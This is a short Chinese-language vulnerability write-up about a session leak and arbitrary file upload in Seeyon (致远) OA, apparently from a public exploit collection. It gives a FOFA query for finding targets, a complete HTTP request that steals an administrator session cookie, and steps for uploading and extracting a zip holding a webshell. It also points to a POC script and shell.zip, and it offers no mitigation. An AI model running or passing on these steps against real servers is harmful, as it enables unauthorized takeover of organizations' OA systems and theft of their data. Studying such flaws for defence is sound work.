致远OA Session泄露 任意文件上传漏洞

漏洞描述

致远OA通过发送特殊请求获取session,在通过文件上传接口上传webshell控制服务器

漏洞影响

致远OA

FOFA

title="致远"

漏洞复现

首先要获取管理员cookie

POST /seeyon/thirdpartyController.do HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 133
Content-Type: application/x-www-form-urlencoded

method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1

返回包出现 Sset-Cookie 和 a8genius.do 即为成功获取

上传压缩包添加 Cookie上传

然后构造请求解压压缩包

状态码返回500即为上传成功

漏洞POC

脚本在文件目录的 POC中

其中含有zip压缩包 shell.zip, 如果上传失败更改一下文件名

Last updated

Was this helpful?